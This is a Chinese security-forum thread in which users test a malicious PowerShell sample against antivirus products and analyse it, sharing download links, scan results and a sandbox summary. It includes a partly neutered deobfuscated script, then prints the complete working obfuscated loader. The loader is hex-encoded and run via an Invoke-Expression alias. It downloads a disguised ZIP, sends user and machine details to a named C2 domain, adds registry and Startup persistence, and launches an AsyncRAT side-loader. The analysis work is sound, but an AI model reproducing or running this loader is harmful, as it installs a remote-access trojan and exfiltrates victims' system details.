恶意ps1脚本

御坂14857号

下载：
https://wwqr.lanzouu.com/irTHy30a7ceh
https://c.wss.pet/f/her08ztywit（72h）
https://wormhole.app/J9QNzD#7Mo7kfLKpSLDTgfQwsHOrA（24h）

vt初次上传0检出，微步云判定未知，opentip动态分析报毒
https://www.virustotal.com/gui/f ... 3729b737f/detection
https://s.threatbook.com/report/ ... ff268bdc703729b737f
https://opentip.kaspersky.com/D3 ... /results?tab=upload

pal家族

被卡巴拉黑了
扫描不会杀，得双击才杀。、

ulyanov2233

奇安信天穹行为总结出来有异常但是总体判定安全，经常这样，好奇怪

该样本名为`download.ps1`，是一个在Windows XP系统上运行的PowerShell脚本。样本通过`SyStem.exe`进程创建了样本进程`84748097.exe`，最终由`powershell.exe`执行。样本在执行过程中表现出多种行为，包括但不限于：

1. **文件操作**：样本检测了文件的`alternative data stream`的`zone.identifier`信息，这可能用于隐藏或混淆文件内容，以逃避检测。

2. **注册表操作**：样本频繁地打开和读取多个注册表项，包括系统设置、安全策略、网络设置等，这可能用于获取系统信息或修改系统配置，以逃避检测或执行恶意操作。

3. **网络通信**：样本通过RPC调用进行网络通信，这可能用于与远程服务器建立连接，执行恶意操作或传输数据。

4. **环境检测**：样本使用`NtQueryInformationProcess`技术检测分析环境，这可能用于判断当前是否处于安全分析环境中，以决定是否执行恶意操作。

5. **注册表设置**：样本设置了多个注册表键值，这可能用于持久化自身或修改系统行为，以确保样本在系统重启后仍然能够运行。

6. **互斥量创建**：样本创建了一个命名互斥量`Local\ZonesCounterMutex`，这可能用于防止多个实例同时运行，以确保样本的唯一性或控制样本的执行流程。

总体来看，该样本具有较强的隐蔽性和逃避检测的能力，通过多种技术手段获取系统信息、修改系统配置，并可能与远程服务器建立连接执行恶意操作。这些行为表明样本具有潜在的恶意性质，需要进一步分析以确定其具体功能和目标。

心醉咖啡

金山毒霸扫描miss

lsop1349987

drweb/avast/Avira/江民运行miss（200 OK）

GDHJDSYDH

EIS扫描miss，沙盒内运行冰盾拦截几次，放行后EIS拦截网址

hansyu

GDHJDSYDH 发表于 2025-7-4 23:31
EIS扫描miss，沙盒内运行冰盾拦截几次，放行后EIS拦截网址

ESSP ELG
2025/7/5 0:46:17;ESET LiveGuard;文件;R:\TestBox\download.ps1;ESET LiveGuard 特洛伊木马;已删除;;;E081A901ACE47A5BF625337EBBABD95490187F92;2025/7/5 0:45:55

biue

腾讯电脑管家 不报

图钉鱼

https://www.virustotal.com/gui/file/d7d3e81792db0767a5bb35f4fadab3a5a6a5426102db75e90467df5ee3c09c63/detection

下载物   https://wormhole.app/l3rzb9#IWVLOrz-KQ_IRDWHcYUxuA




处理后代码

1. 
   
2. $lFNskEODF = 'LvVzSDAJry';
   
3. $VXMIYtquRtqgBF = $false;
   
4. $mtx = New-Object System.Threading.Mutex($true, $lFNskEODF, [ref]$VXMIYtquRtqgBF);
   
5. if(-not $VXMIYtquRtqgBF){exit}
   
6. $QTepOGdn = [guid]::NewGuid().ToString();
   
7. $aKDcLTLzCr = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly92cGxheWVyLmNsL2Fra3NzZXJpdmNzZXNvc29zcHFzZi5qcGc='));
   
8. $EctrWgSLoomAxne = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly9ic3Ryc3YuY29tL21hb3NpdHF3amFzZmE='));
   
9. $VhPjluQffeW = "$env:TEMP\\kBLUHGub.jpg";
   
10. $afnXjfrPAsB = "$env:APPDATA\\kBLUHGub\";
    
11. try {md $afnXjfrPAsB -ea 0 | Out-Null} catch {}
    
12. try {
    
13.     $w = # [DISABLED] Download attempt
    
14.     $w.open('GET', $aKDcLTLzCr, $false)
    
15.     $w.setRequestHeader('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)')
    
16.     $w.send()
    
17.     $a = [byte[]]$w.responseBody
    
18.     [Write-Host "[BLOCKED] File write attempt"($VhPjluQffeW, $a)
    
19.     Rename-Item $VhPjluQffeW ($VhPjluQffeW -replace '.jpg','.zip')
    
20.     $zip = ($VhPjluQffeW -replace '.jpg','.zip')
    
21.     Add-Type -A 'System.IO.Compression.FileSystem'
    
22.     [IO.Compression.ZipFile]::ExtractToDirectory($zip, $afnXjfrPAsB)
    
23.     Remove-Item $zip -force
    
24. 
    
25.     $osver = [System.Environment]::OSVersion.VersionString
    
26.     $osname = (Get-WmiObject Win32_OperatingSystem).Caption
    
27.     $cs = Get-WmiObject Win32_ComputerSystem
    
28.     $pcmodel = $cs.Model
    
29.     $pcmanuf = $cs.Manufacturer
    
30. 
    
31.     $url = "DISABLED_URL?id=$($QTepOGdn)&s=unzip_ok" +
    
32.         "&user=$env:USERNAME" +
    
33.         "&pc=$env:COMPUTERNAME" +
    
34.         "&cwd=$afnXjfrPAsB" +
    
35.         "&osver=$osver" +
    
36.         "&osname=$([uri]::EscapeDataString($osname))" +
    
37.         "&pcmodel=$([uri]::EscapeDataString($pcmodel))" +
    
38.         "&pcmanuf=$([uri]::EscapeDataString($pcmanuf))"
    
39.     iwr $url -UseBasicParsing
    
40. } catch {
    
41.     $url = "DISABLED_URL?id=$($QTepOGdn)&s=unzip_fail&msg=$($_)" +
    
42.         "&user=$env:USERNAME" +
    
43.         "&pc=$env:COMPUTERNAME" +
    
44.         "&cwd=$afnXjfrPAsB"
    
45.     iwr $url -UseBasicParsing
    
46. }
    
47. $e = Get-ChildItem -Path $afnXjfrPAsB -Filter *.exe -Recurse | Select-Object -First 1
    
48. if ($null -eq $e) {
    
49.     $url = "DISABLED_URL?id=$($QTepOGdn)&s=run_fail&msg=EXE_NOT_FOUND" +
    
50.         "&user=$env:USERNAME" +
    
51.         "&pc=$env:COMPUTERNAME" +
    
52.         "&cwd=$afnXjfrPAsB"
    
53.     iwr $url -UseBasicParsing
    
54.     exit
    
55. }
    
56. $p = $e.FullName
    
57. $exeDir = Split-Path -Path $p -Parent
    
58. $osver = [System.Environment]::OSVersion.VersionString
    
59. $osname = (Get-WmiObject Win32_OperatingSystem).Caption
    
60. $cs = Get-WmiObject Win32_ComputerSystem
    
61. $pcmodel = $cs.Model
    
62. $pcmanuf = $cs.Manufacturer
    
63. $autostartCmd = "powershell -WindowStyle Hidden -Command `"Write-Host "[BLOCKED] Attempted process execution" -FilePath `"$($p)`" -WorkingDirectory `"$($exeDir)`" -WindowStyle Hidden`""
    
64. try {
    
65.     # [DISABLED] Registry persistence attempt' -Name ('up'+$QTepOGdn.Substring(0,4)) -Value $autostartCmd
    
66.     $url = "DISABLED_URL?id=$($QTepOGdn)&s=autorun_run_ok" +
    
67.         "&user=$env:USERNAME" +
    
68.         "&pc=$env:COMPUTERNAME" +
    
69.         "&cwd=$exeDir" +
    
70.         "&osver=$osver" +
    
71.         "&osname=$([uri]::EscapeDataString($osname))" +
    
72.         "&pcmodel=$([uri]::EscapeDataString($pcmodel))" +
    
73.         "&pcmanuf=$([uri]::EscapeDataString($pcmanuf))"
    
74.     iwr $url -UseBasicParsing
    
75. } catch {
    
76.     $url = "DISABLED_URL?id=$($QTepOGdn)&s=autorun_run_fail&msg=$($_)" +
    
77.         "&user=$env:USERNAME" +
    
78.         "&pc=$env:COMPUTERNAME" +
    
79.         "&cwd=$exeDir"
    
80.     iwr $url -UseBasicParsing
    
81. }
    
82. try {
    
83.     # [DISABLED] Registry persistence attemptOnce' -Name ('uo'+$QTepOGdn.Substring(0,4)) -Value $autostartCmd
    
84.     $url = "DISABLED_URL?id=$($QTepOGdn)&s=autorun_runonce_ok" +
    
85.         "&user=$env:USERNAME" +
    
86.         "&pc=$env:COMPUTERNAME" +
    
87.         "&cwd=$exeDir" +
    
88.         "&osver=$osver" +
    
89.         "&osname=$([uri]::EscapeDataString($osname))" +
    
90.         "&pcmodel=$([uri]::EscapeDataString($pcmodel))" +
    
91.         "&pcmanuf=$([uri]::EscapeDataString($pcmanuf))"
    
92.     iwr $url -UseBasicParsing
    
93. } catch {
    
94.     $url = "DISABLED_URL?id=$($QTepOGdn)&s=autorun_runonce_fail&msg=$($_)" +
    
95.         "&user=$env:USERNAME" +
    
96.         "&pc=$env:COMPUTERNAME" +
    
97.         "&cwd=$exeDir"
    
98.     iwr $url -UseBasicParsing
    
99. }
    
100. try {
     
101.     $WshShell = New-Object -ComObject WScript.Shell
     
102.     $lnk = $env:APPDATA + '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\' + $QTepOGdn.Substring(0,5) + '.lnk'
     
103.     $shortcut = $WshShell.CreateShortcut($lnk)
     
104.     $shortcut.TargetPath = $p
     
105.     $shortcut.WorkingDirectory = $exeDir
     
106.     $shortcut.WindowStyle = 7
     
107.     $shortcut.Save()
     
108.     $url = "DISABLED_URL?id=$($QTepOGdn)&s=autorun_shortcut_ok" +
     
109.         "&user=$env:USERNAME" +
     
110.         "&pc=$env:COMPUTERNAME" +
     
111.         "&cwd=$exeDir" +
     
112.         "&osver=$osver" +
     
113.         "&osname=$([uri]::EscapeDataString($osname))" +
     
114.         "&pcmodel=$([uri]::EscapeDataString($pcmodel))" +
     
115.         "&pcmanuf=$([uri]::EscapeDataString($pcmanuf))"
     
116.     iwr $url -UseBasicParsing
     
117. } catch {
     
118.     $url = "DISABLED_URL?id=$($QTepOGdn)&s=autorun_shortcut_fail&msg=$($_)" +
     
119.         "&user=$env:USERNAME" +
     
120.         "&pc=$env:COMPUTERNAME" +
     
121.         "&cwd=$exeDir"
     
122.     iwr $url -UseBasicParsing
     
123. }
     
124. try {
     
125.     Write-Host "[BLOCKED] Attempted process execution" -FilePath $p -WorkingDirectory $exeDir -WindowStyle Hidden
     
126.     $url = "DISABLED_URL?id=$($QTepOGdn)&s=run_ok" +
     
127.         "&user=$env:USERNAME" +
     
128.         "&pc=$env:COMPUTERNAME" +
     
129.         "&cwd=$exeDir" +
     
130.         "&osver=$osver" +
     
131.         "&osname=$([uri]::EscapeDataString($osname))" +
     
132.         "&pcmodel=$([uri]::EscapeDataString($pcmodel))" +
     
133.         "&pcmanuf=$([uri]::EscapeDataString($pcmanuf))"
     
134.     iwr $url -UseBasicParsing
     
135. } catch {
     
136.     $url = "DISABLED_URL?id=$($QTepOGdn)&s=run_fail&msg=$($_)" +
     
137.         "&user=$env:USERNAME" +
     
138.         "&pc=$env:COMPUTERNAME" +
     
139.         "&cwd=$exeDir"
     
140.     iwr $url -UseBasicParsing
     
141. }
     
142. 
     

复制代码

试图下载一个文件（从之前解码的URL：[https]://vplayer[.]cl/akksserivcsesossqsf[.]jpg），然后将其重命名为.zip文件并解压。

在解压成功后，会收集操作系统版本、名称，计算机制造商和型号等信息，并通过HTTP请求发送到C2服务器：[https]://bstrsv[.]com/maositqwjasfa。​
在解压目录中查找第一个.exe文件。
设置自启动项（注册表、开始菜单）：
创建快捷方式到启动文件夹：
在当前用户的启动文件夹中创建一个快捷方式，指向exe文件（白文件），这样在用户登录时会自动运行。
运行可执行文件：
运行asycsssaqwyncx86updservicesvp.exe文件。
在整个过程中，每一步成功或失败都会向C2服务器发送报告。

asycsssaqwyncx86updservicesvp.exe 白文件，运行后加载黑DLL（libwinpthread-1.dll）

VirusTotal - File - 29a09e47cc64fffffd4cd3ea78ca540d12dbdc9782aa8f2b1f256d6b11f81088

黑DLL  为AsyncRAT木马

C2：45.134.26[.]74[:]56001

由预测机器学习检测为恶意软件: Troj.Win32.TRX.XXPE50FFF094

jxfaiu

双击，记事本打开




# koEv3qKG5kwnf61l6VfVCCle36zf8HnY3P0t7sz5pfkvUrT9Jok0olQ4YsvbC9VTUBRRuB3hUyXCxAUeZdgbV1vIhzIQifSU1IpDe0cvhrnquxs6HSaA7CSF7pIpoFY477L3knNepmV1FNXr6yB6P6T3ouMNrPPPwpVSnGahAHY1Iyb25T3sNiiveyF72bgMtC2l4WlRCf6ZHjw2O9pbQgEZ4pgeu3hhafQOXrE6U7exZszxVeJqox4wX1JqSiAqCjdPMKYQhE05j5Xjm6PbcnDZi2qOdTKfcEbmuYc7J8ANZVMCHtRPpkmSMxJ08XDU0A6C3J4LkNMuIVARawQR3Slob9mr5kZ4VXT1wAaTDm2FI5D4uXQrdMWksiHdLhVwB7Qcg7sKI84N0BVMh93qgWeEw4ZWRjGeqCDPta216FLHTnxCZQJv52HM1owFZD5XfSPigXuRiAiVlRgYenOZ6XdHtGC4nFtDw6nCYBwMEzi3hQCKSxU5
$DamzmYgm='0a246c464e736b454f4446203d20274c76567a5344414a7279273b0a2456584d4959747175527471674246203d202466616';
$KsoUfMor='c73653b0a246d7478203d204e65772d4f626a6563742053797374656d2e546872656164696e672e4d757465782824747275652c20246c46';
$GFYCvDly='4e736b454f44462c205b7265665d2456584d4959747175527471674246293b0a6966282d6e6f74202456584d495974';
$tiHrSZMM='7175527471674246297b657869747d0a24515465704f47646e203d205b677569645d3a3a4e65774775696428292e546f';
$qSTPDMve='537472696e6728293b0a24614b44634c544c7a4372203d205b53797374656d2e546578742e456e636f64696e675d3a3a555446382e4765745374';
$xlLSEcwe='72696e67285b53797374656d2e436f6e766572745d3a3a46726f6d426173653634537472696e6728276148523063484d364c793932634778';
$sxkTxsgz='68655756794c6d4e734c32467261334e7a5a584a70646d4e7a5a584e766332397a6348467a5a6935716347633d2729293b0a244563747';
$QhqwtvaJ='25767534c6f6f6d41786e65203d205b53797374656d2e546578742e456e636f64696e675d3a3a555446382e4765745';
$TXUQMfsU='37472696e67285b53797374656d2e436f6e766572745d3a3a46726f6d426173653634537472696e6728276148523063484d364c793';
$SALWpYmc='9696333527963335975593239744c32316862334e7064484633616d467a5a6d453d2729293b0a245668506a6c755166666557203d202224656e76';
$rHcZtrDW='3a54454d505c5c6b424c55484775622e6a7067223b0a2461666e586a667250417342203d202224656e763a41505044415441';
$pGdyOwMc='5c5c6b424c55484775625c5c223b0a747279207b6d64202461666e586a667250417342202d65612030207c204f75742d4e756c6c';
$kJtwPHpj='7d206361746368207b7d0a747279207b0a202020202477203d204e65772d4f626a656374202d436f6d4f626a656374204d73786d6c322e';
$WyJKnAVb='584d4c485454500a2020202024772e6f70656e2827474554272c2024614b44634c544c7a43722c202466616c7365290a2020202024772e736';
$KJXMPoCS='574526571756573744865616465722827557365722d4167656e74272c20274d6f7a696c6c612f352e30202857696e6';
$EVgjbGgy='46f7773204e542031302e303b2057696e36343b207836342927290a2020202024772e73656e6428290a202020202461203d205b62797465';
$EkQXYbgs='5b5d5d24772e726573706f6e7365426f64790a202020205b494f2e46696c655d3a3a5772697465416c6c427974657328245';
$ZeowIEtZ='668506a6c7551666665572c202461290a2020202052656e616d652d4974656d20245668506a6c75516666655720282';
$DzEuKKSE='45668506a6c755166666557202d7265706c61636520272e6a7067272c272e7a697027290a20202020247a6970203d2028245668506a6';
$fZvNbLBy='c755166666557202d7265706c61636520272e6a7067272c272e7a697027290a202020204164642d54797065202d4120275';
$NjzrQgoP='3797374656d2e494f2e436f6d7072657373696f6e2e46696c6553797374656d270a202020205b494f2e436f6d70726';
$DnUcpjVE='57373696f6e2e5a697046696c655d3a3a45787472616374546f4469726563746f727928247a69702c202461666e586';
$nwgqbUEc='a667250417342290a2020202052656d6f76652d4974656d20247a6970202d666f7263650a0a20202020246f73766572203d2';
$TpITxEma='05b53797374656d2e456e7669726f6e6d656e745d3a3a4f5356657273696f6e2e56657273696f6e537472696e670a20202020246f736e616d65203';
$fTMsWyij='d20284765742d576d694f626a6563742057696e33325f4f7065726174696e6753797374656d292e43617074696f6e0a2020202024637320';
$QtREUOcX='3d204765742d576d694f626a6563742057696e33325f436f6d707574657253797374656d0a202020202470636d6f64656c203d202';
$xpUKpeYP='463732e4d6f64656c0a202020202470636d616e7566203d202463732e4d616e7566616374757265720a0a20202020247';
$dcivteCO='5726c203d202268747470733a2f2f6273747273762e636f6d2f6d616f73697471776a617366613f69643d242824515465704f47646e2926';
$anLPMQjO='733d756e7a69705f6f6b22202b0a20202020202020202226757365723d24656e763a555345524e414d4522202b0a20';
$BcgtUCIR='20202020202020222670633d24656e763a434f4d50555445524e414d4522202b0a202020202020202022266377643d2461666e586a667250';
$ncnZatDL='41734222202b0a202020202020202022266f737665723d246f7376657222202b0a202020202020202022266f736e616d653d24285b757269';
$CZyptLUM='5d3a3a45736361706544617461537472696e6728246f736e616d65292922202b0a2020202020202020222670636d6f64656c3d24285b7572695d';
$MDcYdzjA='3a3a45736361706544617461537472696e67282470636d6f64656c292922202b0a2020202020202020222670636d616e7';
$wTHmDEgw='5663d24285b7572695d3a3a45736361706544617461537472696e67282470636d616e75662929220a202020206977';
$BywAMuis='72202475726c202d557365426173696350617273696e670a7d206361746368207b0a202020202475726c203d202268747470733a2f2f627';
$XpAnUwfV='3747273762e636f6d2f6d616f73697471776a617366613f69643d242824515465704f47646e2926733d756e7a69';
$EItuJBrU='705f6661696c266d73673d2428245f2922202b0a20202020202020202226757365723d24656e763a555345524e414d4522202b0a20202020202';
$rcYLraOu='02020222670633d24656e763a434f4d50555445524e414d4522202b0a202020202020202022266377643d2461666e586a667250417342220';
$SOnKuxvC='a20202020697772202475726c202d557365426173696350617273696e670a7d0a2465203d204765742d4368696c644974656';
$mYQkySOv='d202d50617468202461666e586a667250417342202d46696c746572202a2e657865202d52656375727365207c2053656c6563';
$HtoGBsRA='742d4f626a656374202d466972737420310a69662028246e756c6c202d657120246529207b0a202020202475726c20';
$ApTQUkxX='3d202268747470733a2f2f6273747273762e636f6d2f6d616f73697471776a617366613f69643d242824515465704f47646e2926733d72756e5f';
$ISUVNqkt='6661696c266d73673d4558455f4e4f545f464f554e4422202b0a20202020202020202226757365723d24656e763a555345524';
$HqpHblze='e414d4522202b0a2020202020202020222670633d24656e763a434f4d50555445524e414d4522202b0a202020202020202022266';
$TUkBQViK='377643d2461666e586a667250417342220a20202020697772202475726c202d557365426173696350617273696e670a202020';
$csQaeQFq='20657869740a7d0a2470203d2024652e46756c6c4e616d650a24657865446972203d2053706c69742d50617468202d50617468202470202';
$nxRYmxgy='d506172656e740a246f73766572203d205b53797374656d2e456e7669726f6e6d656e745d3a3a4f5356657273696f6e2e56657273696f6e5374726';
$horAWWLO='96e670a246f736e616d65203d20284765742d576d694f626a6563742057696e33325f4f7065726174696e6753797374656d29';
$RBltCkkq='2e43617074696f6e0a246373203d204765742d576d694f626a6563742057696e33325f436f6d7075746572537973746';
$zzfHrTmM='56d0a2470636d6f64656c203d202463732e4d6f64656c0a2470636d616e7566203d202463732e4d616e7566616374757265720a24';
$OJnaNRqj='6175746f7374617274436d64203d2022706f7765727368656c6c202d57696e646f775374796c652048696464656e202d436f6d6d616e6420602';
$EyzDPlDa='253746172742d50726f63657373202d46696c655061746820602224282470296022202d576f726b696e674469726563746f727920602';
$dvpgIAuG='2242824657865446972296022202d57696e646f775374796c652048696464656e6022220a747279207b0a202020205365742';
$HYQkICds='d4974656d50726f7065727479202d506174682027484b43553a5c536f6674776172655c4d6963726f736f66745c57';
$srlxbPmF='696e646f77735c43757272656e7456657273696f6e5c52756e27202d4e616d652028277570272b24515465704f476';
$WJlGzzbu='46e2e537562737472696e6728302c342929202d56616c756520246175746f7374617274436d640a202020202475726c203d2022687';
$NzAWHYwB='47470733a2f2f6273747273762e636f6d2f6d616f73697471776a617366613f69643d242824515465704f47646e2926733d6175746f7275';
$oVNcWvJp='6e5f72756e5f6f6b22202b0a20202020202020202226757365723d24656e763a555345524e414d4522202b0a2020202020202020222670633d24';
$gavvFibE='656e763a434f4d50555445524e414d4522202b0a202020202020202022266377643d2465786544697222202b0a202020202020202022266f73';
$acYYdpMA='7665723d246f7376657222202b0a202020202020202022266f736e616d653d24285b7572695d3a3a4573636170654461';
$hreSEwmr='7461537472696e6728246f736e616d65292922202b0a2020202020202020222670636d6f64656c3d24285b7572695d3a3a4573636170';
$qkrQzdum='6544617461537472696e67282470636d6f64656c292922202b0a2020202020202020222670636d616e75663d24285b7572695d3a3a45736361';
$AxEaIJRo='706544617461537472696e67282470636d616e75662929220a20202020697772202475726c202d557365426173696';
$kWIhmljw='350617273696e670a7d206361746368207b0a202020202475726c203d202268747470733a2f2f6273747273762e636f6d2f6d616f73697471776a617';
$psVFJbNN='366613f69643d242824515465704f47646e2926733d6175746f72756e5f72756e5f6661696c266d73673d2428245f2';
$FoUZiLAw='922202b0a20202020202020202226757365723d24656e763a555345524e414d4522202b0a2020202020202020222670633d24656e763a434f4d50';
$xaliiiZn='555445524e414d4522202b0a202020202020202022266377643d24657865446972220a20202020697772202475726c202d5';
$PiWPvDrx='57365426173696350617273696e670a7d0a747279207b0a202020205365742d4974656d50726f7065727479202d506174682';
$xiVbGyeH='027484b43553a5c536f6674776172655c4d6963726f736f66745c57696e646f77735c43757272656e7456657273696f';
$oDqitTJY='6e5c52756e4f6e636527202d4e616d65202827756f272b24515465704f47646e2e537562737472696e6728302c342929202d56616c75652024';
$vsEvRvZB='6175746f7374617274436d640a202020202475726c203d202268747470733a2f2f6273747273762e636f6d2f6d616f73697471776a61';
$fZUSckLD='7366613f69643d242824515465704f47646e2926733d6175746f72756e5f72756e6f6e63655f6f6b22202b0a2020202020';
$iZAwozvw='2020202226757365723d24656e763a555345524e414d4522202b0a2020202020202020222670633d24656e763a434';
$OjBezIvh='f4d50555445524e414d4522202b0a202020202020202022266377643d2465786544697222202b0a202020202020202022266f737665723d';
$JLcBJmIO='246f7376657222202b0a202020202020202022266f736e616d653d24285b7572695d3a3a4573636170654461746153747';
$wmbrUCQI='2696e6728246f736e616d65292922202b0a2020202020202020222670636d6f64656c3d24285b7572695d3a3a4573636170654461746';
$MJpsQObZ='1537472696e67282470636d6f64656c292922202b0a2020202020202020222670636d616e75663d24285b7572695d3a3a457363617065';
$cRPThctP='44617461537472696e67282470636d616e75662929220a20202020697772202475726c202d557365426173696350617273696e670a7d20';
$bziKUBJg='6361746368207b0a202020202475726c203d202268747470733a2f2f6273747273762e636f6d2f6d616f73697471776a617366613f69643d';
$KeDYMqhX='242824515465704f47646e2926733d6175746f72756e5f72756e6f6e63655f6661696c266d73673d2428245f2922202b0a2020202020202';
$RiFJWoOU='0202226757365723d24656e763a555345524e414d4522202b0a2020202020202020222670633d24656e763a434f4d50555445524e414d4522202b0a2';
$oZbKcPaX='02020202020202022266377643d24657865446972220a20202020697772202475726c202d557365426173696350617273696e670a7d0a747279207b0';
$dQyZznzY='a20202020245773685368656c6c203d204e65772d4f626a656374202d436f6d4f626a65637420575363726970742e5368656c6c0a2';
$NcXEFCma='0202020246c6e6b203d2024656e763a41505044415441202b20275c5c4d6963726f736f66745c5c57696e646f77735c5c537461727';
$nQJcUxlN='4204d656e755c5c50726f6772616d735c5c537461727475705c5c27202b2024515465704f47646e2e537562737472696e';
$LyrPunIO='6728302c3529202b20272e6c6e6b270a202020202473686f7274637574203d20245773685368656c6c2e43726561746553686f727463757428246c6';
$SneRJvUG='e6b290a202020202473686f72746375742e54617267657450617468203d2024700a202020202473686f72746375742e576f726b696e674469';
$lrmODWib='726563746f7279203d20246578654469720a202020202473686f72746375742e57696e646f775374796c65203d20370a2020202024736';
$qdExtvOW='86f72746375742e5361766528290a202020202475726c203d202268747470733a2f2f6273747273762e636f6d2f6d6';
$gkTmUymQ='16f73697471776a617366613f69643d242824515465704f47646e2926733d6175746f72756e5f73686f7274637574';
$fvkRFCwr='5f6f6b22202b0a20202020202020202226757365723d24656e763a555345524e414d4522202b0a2020202020202020';
$Jppxtzii='222670633d24656e763a434f4d50555445524e414d4522202b0a202020202020202022266377643d2465786544697222202b0a2020202020202';
$zDsyTWCP='02022266f737665723d246f7376657222202b0a202020202020202022266f736e616d653d24285b7572695d3a3a4';
$mGOQElri='5736361706544617461537472696e6728246f736e616d65292922202b0a2020202020202020222670636d6f64656c3d24285';
$npPGlHkC='b7572695d3a3a45736361706544617461537472696e67282470636d6f64656c292922202b0a2020202020202020222670636d616e';
$QeQJjCdo='75663d24285b7572695d3a3a45736361706544617461537472696e67282470636d616e75662929220a202020206977722024';
$REaOiaIe='75726c202d557365426173696350617273696e670a7d206361746368207b0a202020202475726c203d202268747470733a2f2f62737';
$eUFpsoNd='47273762e636f6d2f6d616f73697471776a617366613f69643d242824515465704f47646e2926733d6175746f72756e5f73686f72746';
$FasmvQFQ='375745f6661696c266d73673d2428245f2922202b0a20202020202020202226757365723d24656e763a555345524e';
$ElKGLBOp='414d4522202b0a2020202020202020222670633d24656e763a434f4d50555445524e414d4522202b0a202020202020202022266377643d246578654';
$MjfzCmwQ='46972220a20202020697772202475726c202d557365426173696350617273696e670a7d0a747279207b0a2020202053746';
$imApsPZV='172742d50726f63657373202d46696c6550617468202470202d576f726b696e674469726563746f72792024657865446972202d57696e646f77';
$GibCDRGB='5374796c652048696464656e0a202020202475726c203d202268747470733a2f2f6273747273762e636f6d2f6d616f73697471';
$Losgnsyd='776a617366613f69643d242824515465704f47646e2926733d72756e5f6f6b22202b0a2020202020202020222675';
$SYBSjKWI='7365723d24656e763a555345524e414d4522202b0a2020202020202020222670633d24656e763a434f4d50555445524e414d45';
$KJSIEemb='22202b0a202020202020202022266377643d2465786544697222202b0a202020202020202022266f737665723d246f7376';
$ylApUjfl='657222202b0a202020202020202022266f736e616d653d24285b7572695d3a3a45736361706544617461537472';
$iSYQGpLJ='696e6728246f736e616d65292922202b0a2020202020202020222670636d6f64656c3d24285b7572695d3a3a45736361706544617';
$tktMDnlb='461537472696e67282470636d6f64656c292922202b0a2020202020202020222670636d616e75663d24285b7572695d3a3a4573';
$zgGJrsyy='6361706544617461537472696e67282470636d616e75662929220a20202020697772202475726c202d557365426173696350617273696';
$fqXRLEPU='e670a7d206361746368207b0a202020202475726c203d202268747470733a2f2f6273747273762e636f6d2f6d616f73697471776a617366613f696';
$AUxAtqzK='43d242824515465704f47646e2926733d72756e5f6661696c266d73673d2428245f2922202b0a20202020202020';
$XUkSBhBB='202226757365723d24656e763a555345524e414d4522202b0a2020202020202020222670633d24656e763a434f4';
$bpbmpgLB='d50555445524e414d4522202b0a202020202020202022266377643d24657865446972220a20202020697772202475726c202d557365';
$LDIJbblW='426173696350617273696e670a7d0a';

function DPoPRYWL($x){
    $b=[byte[]]@();for($i=0;$i -lt $x.Length;$i+=2){$b+=[Convert]::ToByte($x.Substring($i,2),16)}
    return [System.Text.Encoding]::UTF8.GetString($b)
}

Set-Alias AJogFK Invoke-Expression
$YQloQOkkbmieOPn = DPoPRYWL($DamzmYgm+$KsoUfMor+$GFYCvDly+$tiHrSZMM+$qSTPDMve+$xlLSEcwe+$sxkTxsgz+$QhqwtvaJ+$TXUQMfsU+$SALWpYmc+$rHcZtrDW+$pGdyOwMc+$kJtwPHpj+$WyJKnAVb+$KJXMPoCS+$EVgjbGgy+$EkQXYbgs+$ZeowIEtZ+$DzEuKKSE+$fZvNbLBy+$NjzrQgoP+$DnUcpjVE+$nwgqbUEc+$TpITxEma+$fTMsWyij+$QtREUOcX+$xpUKpeYP+$dcivteCO+$anLPMQjO+$BcgtUCIR+$ncnZatDL+$CZyptLUM+$MDcYdzjA+$wTHmDEgw+$BywAMuis+$XpAnUwfV+$EItuJBrU+$rcYLraOu+$SOnKuxvC+$mYQkySOv+$HtoGBsRA+$ApTQUkxX+$ISUVNqkt+$HqpHblze+$TUkBQViK+$csQaeQFq+$nxRYmxgy+$horAWWLO+$RBltCkkq+$zzfHrTmM+$OJnaNRqj+$EyzDPlDa+$dvpgIAuG+$HYQkICds+$srlxbPmF+$WJlGzzbu+$NzAWHYwB+$oVNcWvJp+$gavvFibE+$acYYdpMA+$hreSEwmr+$qkrQzdum+$AxEaIJRo+$kWIhmljw+$psVFJbNN+$FoUZiLAw+$xaliiiZn+$PiWPvDrx+$xiVbGyeH+$oDqitTJY+$vsEvRvZB+$fZUSckLD+$iZAwozvw+$OjBezIvh+$JLcBJmIO+$wmbrUCQI+$MJpsQObZ+$cRPThctP+$bziKUBJg+$KeDYMqhX+$RiFJWoOU+$oZbKcPaX+$dQyZznzY+$NcXEFCma+$nQJcUxlN+$LyrPunIO+$SneRJvUG+$lrmODWib+$qdExtvOW+$gkTmUymQ+$fvkRFCwr+$Jppxtzii+$zDsyTWCP+$mGOQElri+$npPGlHkC+$QeQJjCdo+$REaOiaIe+$eUFpsoNd+$FasmvQFQ+$ElKGLBOp+$MjfzCmwQ+$imApsPZV+$GibCDRGB+$Losgnsyd+$SYBSjKWI+$KJSIEemb+$ylApUjfl+$iSYQGpLJ+$tktMDnlb+$zgGJrsyy+$fqXRLEPU+$AUxAtqzK+$XUkSBhBB+$bpbmpgLB+$LDIJbblW)
$OzHUzJPHnwQkec = $YQloQOkkbmieOPn
# Ложный мусор SYXJBMBLnmUwEKy2u0c6piICFBQI7tqHMfoX5TEmZfWKWvDLZJSVkWh1kSDhhPpK0n4qfQ0VMiHWeIbT5aXPTZ901UYqYvwKqDWw6REJyAXMO3Xm1AmH9Q5Q8I3FSEVAuxhDIekD3tgZdNY80qUAfn
try { if ($true) { AJogFK $OzHUzJPHnwQkec } else { WN0QMsoF5Yr9Cdx48xBo53j0rdvO1J } } catch {}
